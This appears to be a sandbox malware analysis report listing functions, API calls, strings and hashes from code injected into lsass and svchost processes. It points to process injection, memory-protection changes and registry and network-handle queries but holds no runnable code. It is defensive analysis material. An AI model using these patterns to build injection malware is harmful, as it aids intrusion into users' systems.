Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: DBF08230344B84A2EA10CB13FD541BDA260BB48FD0F0CA132DE9A4BB29CE7DC4818300

Function 00000161C737A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000161C737A154
GetProcAddress.KERNEL32 ref: 00000161C737A16A
FreeLibrary.KERNEL32 ref: 00000161C737A187

Strings

mscoree.dll, xrefs: 00000161C737A14B
CorExitProcess, xrefs: 00000161C737A163

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: a0dd28094b0c8383a98608a36cdd665a40672743271e26d7c779e9ec6d8b158d
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: AAF0FEB1351644B1FB54CF64EC843BD6760AB48B91F4C301A991B89664DFBAC488C700

Function 00000161C73751B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000161C7375236

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: b96fcb01bb8c7608aaac0624cf411bd559718bc6d4d61d6a5c6ecad8b29c172d
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 9202EB32259B8496E764CB55E9943AEF7A0F3C4790F145015EA8E87BA8DFBDC484CF10

Function 00000161C7380860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000161C73808A2
GetConsoleMode.KERNEL32 ref: 00000161C7380960
GetLastError.KERNEL32 ref: 00000161C73809EA

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: bc366686ad59a8ca591c6c522f96be9ca8f092f4ce4a28fd9ced1e36a129721e
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 8681DE32690A50A9FB51DB65DC403FD67A0F744B98F4C2117DE4A6B7A2DBBEC441C320

Function 00000161C73757F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000161C7375806

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 0a5455b91e7801b95055e84f59623123a0f1b58f322608c7082cd2beff88dacf
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: DA61FA32659B80D7E764DB15E98476EB7E0F388754F142116EA8D47BA8DBBEC440CF10

Function 00000161C7381EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000161C7381EE0
_set_statfp.LIBCMT ref: 00000161C7381EFB
_set_statfp.LIBCMT ref: 00000161C7381F17
_set_statfp.LIBCMT ref: 00000161C7381F53

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: c499cf51e5ec560983c1977f30d145344c12512e8d987c07bd0fa8c141f0c6a5
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 94117332AD9A0122F6A89164EC5A3FD51417FA43F4F0C672FBB76063D68BF68D415104

Function 00000161C73512B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000161C73512E0
_set_statfp.LIBCMT ref: 00000161C73512FB
_set_statfp.LIBCMT ref: 00000161C7351317
_set_statfp.LIBCMT ref: 00000161C7351353

Memory Dump Source

Source File: 0000001E.00000002.2683325193.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7340000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 113e641e3351b8220dfc2265e1f52cdffee0fde28f1d74d2008cb2d409747818
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: E2110432AD4E0061F7E59179EC763FD1140AB593F4F4D2634EE7606BDA8AEB8C428200

Function 00000161C7373878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000161C7373886
GetCurrentProcess.KERNEL32 ref: 00000161C73738B4
VirtualProtectEx.KERNEL32 ref: 00000161C73738D6
GetCurrentProcess.KERNEL32 ref: 00000161C73738F4
VirtualProtectEx.KERNEL32 ref: 00000161C7373915

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: c3a8b5ce90c0cbdbfa1955fef1c0f4c8abe38d499118f4e64c2bcd8eda5fc4f4
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: E3115E3A744B80A2EB54DB11F8143BDA6B0FB89B84F08102ADE990B794EF7EC548C701

Function 00000161C73484F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000161C7348503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000161C7348598

Strings

csm, xrefs: 00000161C734857E
f, xrefs: 00000161C7348516

Memory Dump Source

Source File: 0000001E.00000002.2683325193.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7340000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: ea2620bba6edba6e707d88b508559a210cc5e1fdd9f085b1fa48acdba41ef578
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: ED51C17A752600AADB98DF16EC44BFC3B95F340B98F59A124DF0643788DBBAD841C704

Function 00000161C73484D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000161C7348503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000161C7348598

Strings

csm, xrefs: 00000161C734857E
f, xrefs: 00000161C7348516

Memory Dump Source

Source File: 0000001E.00000002.2683325193.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7340000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: ff66ae0bd48695854d6cfa71cb2fbe2e2b2556c64c6dab87096ab8636dddea8f
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 2731BFBA251740A6E758DF13EC44BED3BA4F740BD8F19A014EE5A07785CBBAC941C708

Function 00000161C73714B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000161C73714D5
HeapFree.KERNEL32 ref: 00000161C73714E4
GetProcessHeap.KERNEL32 ref: 00000161C73714F0
HeapFree.KERNEL32 ref: 00000161C73714FF
GetProcessHeap.KERNEL32 ref: 00000161C737152A

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction ID: b593dec155abf8f6284fba2a5a299068fe906803bb6101388c01ae685f2a6487
Opcode Fuzzy Hash: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction Fuzzy Hash: CA111C32654B98A2E754EF6AE8442AEB370F789F84F08502ADB8A07755EF7DC0518740

Function 00000161C73724DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000161C73725C3
StrCpyW.SHLWAPI ref: 00000161C73725DA

Strings

\\.\pipe\, xrefs: 00000161C73725CE

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 4ec8fcc5392ac8653af68df69f07b92592b0c5788ad255719954a090c6aa7942
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 46511C32284781A2E674DE299E543FEE6A0F385780F4CE026CD8A07F99DEF7D4418B44

Function 00000161C7380604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000161C738071B
GetLastError.KERNEL32 ref: 00000161C738073D

Strings

U, xrefs: 00000161C73806C7

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 07b39f9a5cb397f86d8bc653f947353eb3e9ef304412f69b1160db2efa79e9c4
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 6341C672314A80A5EB20DF25E8443FEB7A0F388784F595126EE8E87798DBBDC541CB40

Function 00000161C737D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000161C737D6F9
LCMapStringW.KERNEL32 ref: 00000161C737D781

Strings

LCMapStringEx, xrefs: 00000161C737D6DC, 00000161C737D6ED

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 5cfd17a9a9e75ba7870e574adcf9e2edc03996bac2b5230aaf8eda6d4e3df0b2
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 61110636608BC096DB60CF16F8803AEB7A4F7C9B90F585126EE9D87B59DF79C4548B00

Function 00000161C73794A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000161C73794E8
RaiseException.KERNEL32 ref: 00000161C737952E

Strings

csm, xrefs: 00000161C737951B

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 64c6b11185722b5d7e18c07e9060278be5100a4c27480869a6b7113aa824a2c3
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 86111F32214B8492EB61CF15F9402ADBBA5F788B98F5C5221DF8D0B764DF79C555CB00

Function 00000161C737D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000161C737D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000161C737D6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000161C737D681

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 1e7f81fdbd4879ae1d679c0af9d69e371204545a477214b294b5e43f6da3a19e
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: E3F08931354B90A2E745DF41FD406FD6361AB88B90F4CB016E96907F55CEBAC555C700

Function 00000161C737D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000161C737D631
TlsSetValue.KERNEL32 ref: 00000161C737D648

Strings

FlsSetValue, xrefs: 00000161C737D61E

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: e895dbfcf2f71f9d386b1fed5ea87f136acb6e6e6f918b65f578fb2f713eccb1
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: D7E09272250A40B2EB06CF50FD017FC6362BB88B80F8CB023D9290A756DEBAC959C700

Function 00000161C734CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000161C734CBC5

Strings

November, xrefs: 00000161C734CBA8, 00000161C734CBB2
October, xrefs: 00000161C734CBBE

Memory Dump Source

Source File: 0000001E.00000002.2683325193.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7340000_lsass.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 3fd1d32414abfa5efb4361d20f4ea1387e293bc1503ccd683fc6b9127319f862
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 5DE09A7A280641B2EB4DDB51FC402FC3721AB88740F6DB022A92906393CEBEC9C69314

Function 00000161C7371D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000161C7371D9B
HeapAlloc.KERNEL32 ref: 00000161C7371DAA
GetProcessHeap.KERNEL32 ref: 00000161C7371E1E
HeapFree.KERNEL32 ref: 00000161C7371E2C

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: ca7c34459c201f08f5a03ae884311694f8fe4a5aa7ed1f05b251b7a40fe0b127
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 53218133644B9096EB51DF5AE9002AEF3A0FBC8BD4F195111DE8C47B24FEB9C5428700

Function 00000161C7371274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000161C737127A
HeapAlloc.KERNEL32 ref: 00000161C7371289
GetProcessHeap.KERNEL32 ref: 00000161C73712A3
HeapAlloc.KERNEL32 ref: 00000161C73712B4

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 0008b2d376434935d61f639145acdff6e97fb660d1b920be6b208d328c594daf
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 0EE0ED7169160096E704EF66DC143AD76E1FB88F51F4DD025C9490B354EFBE8499C750

Analysis Process: svchost.exePID: 924, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	2

Executed Functions

Function 00000233B91E3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000233B91E347A
PathFindFileNameW.SHLWAPI ref: 00000233B91E3489

Part of subcall function 00000233B91E3930: StrCmpNIW.SHLWAPI ref: 00000233B91E3948

Part of subcall function 00000233B91E3878: GetModuleHandleW.KERNEL32 ref: 00000233B91E3886
Part of subcall function 00000233B91E3878: GetCurrentProcess.KERNEL32 ref: 00000233B91E38B4
Part of subcall function 00000233B91E3878: VirtualProtectEx.KERNEL32 ref: 00000233B91E38D6
Part of subcall function 00000233B91E3878: GetCurrentProcess.KERNEL32 ref: 00000233B91E38F4
Part of subcall function 00000233B91E3878: VirtualProtectEx.KERNEL32 ref: 00000233B91E3915

CreateThread.KERNEL32 ref: 00000233B91E34D7

Part of subcall function 00000233B91E1EB4: GetCurrentThread.KERNEL32 ref: 00000233B91E1EBF

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 9e3046f45bc7d1cfbc77ee39ec73fe4bc898da923e2f91e08e2621c554fdb02b
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 8811D231614E0D8BFF22D721F80E7A9E6B3BB4434CF441025AA16891D5EF3CC386A320

Function 00000233B91E1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000233B91E1650: GetProcessHeap.KERNEL32 ref: 00000233B91E165B
Part of subcall function 00000233B91E1650: HeapAlloc.KERNEL32 ref: 00000233B91E166A
Part of subcall function 00000233B91E1650: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E16DA
Part of subcall function 00000233B91E1650: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1707
Part of subcall function 00000233B91E1650: RegCloseKey.ADVAPI32 ref: 00000233B91E1721
Part of subcall function 00000233B91E1650: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1741
Part of subcall function 00000233B91E1650: RegCloseKey.ADVAPI32 ref: 00000233B91E175C
Part of subcall function 00000233B91E1650: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E177C
Part of subcall function 00000233B91E1650: RegCloseKey.ADVAPI32 ref: 00000233B91E1797
Part of subcall function 00000233B91E1650: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E17B7
Part of subcall function 00000233B91E1650: RegCloseKey.ADVAPI32 ref: 00000233B91E17D2
Part of subcall function 00000233B91E1650: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E17F2

Sleep.KERNEL32 ref: 00000233B91E1C43
SleepEx.KERNELBASE ref: 00000233B91E1C49

Part of subcall function 00000233B91E1650: RegCloseKey.ADVAPI32 ref: 00000233B91E180D
Part of subcall function 00000233B91E1650: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E182D
Part of subcall function 00000233B91E1650: RegCloseKey.ADVAPI32 ref: 00000233B91E1848
Part of subcall function 00000233B91E1650: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1868
Part of subcall function 00000233B91E1650: RegCloseKey.ADVAPI32 ref: 00000233B91E1883
Part of subcall function 00000233B91E1650: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E18A3
Part of subcall function 00000233B91E1650: RegCloseKey.ADVAPI32 ref: 00000233B91E18BE
Part of subcall function 00000233B91E1650: RegCloseKey.ADVAPI32 ref: 00000233B91E18C8

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: f49d9db37f63498989a444358a17fcd6a2428b4af48ba11da71078292702c594
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 9C310C25700E0D99FB54DF36DA4D36E92B7BB44BDCF14C021DE0987696EE2CCB60A250

Function 00000233B91E3930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000233B91E3948

Strings

dialer, xrefs: 00000233B91E3941

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: cbdbad30d7d88360834fa94df5267bc5343419a0d22ca48b2ca87cccb32d7d7a
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: 66D0A72031160F9BFF14DFA188C9360A372EB0474CF448020CA0502155E71C8F8FE720

Function 00000233B91B2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000233B91B2A31

Memory Dump Source

Source File: 0000001F.00000002.2676152738.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91b0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 71e22f2863701fc86a822d80130fae96769f5fa177e1a3352076fc88185b64e5
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 2861202270125087EA68CF25D5A876CF3A3FB24B98F548825DA1907B89DB3CEB57D700

Non-executed Functions

Function 00000233B91E2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000233B91E2D80
lstrlenW.KERNEL32 ref: 00000233B91E2FBA

Part of subcall function 00000233B91E1A14: OpenProcess.KERNEL32 ref: 00000233B91E1A3A
Part of subcall function 00000233B91E1A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000233B91E1A58
Part of subcall function 00000233B91E1A14: PathFindFileNameW.SHLWAPI ref: 00000233B91E1A67
Part of subcall function 00000233B91E1A14: lstrlenW.KERNEL32 ref: 00000233B91E1A73
Part of subcall function 00000233B91E1A14: StrCpyW.SHLWAPI ref: 00000233B91E1A86
Part of subcall function 00000233B91E1A14: CloseHandle.KERNEL32 ref: 00000233B91E1A94

GetProcAddress.KERNEL32 ref: 00000233B91E2D95

Part of subcall function 00000233B91E1554: StrCmpIW.SHLWAPI ref: 00000233B91E1585

Part of subcall function 00000233B91E3930: StrCmpNIW.SHLWAPI ref: 00000233B91E3948

StrCmpNIW.SHLWAPI ref: 00000233B91E2DD8
lstrlenW.KERNEL32 ref: 00000233B91E2F00

Strings

ntdll.dll, xrefs: 00000233B91E2D79
NtQueryObject, xrefs: 00000233B91E2D8B
\Device\Nsi, xrefs: 00000233B91E2DCB

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: efc1e2a10c956631a501666814a8735a1d77d7a2c747799ecca09e74bfcd8ad6
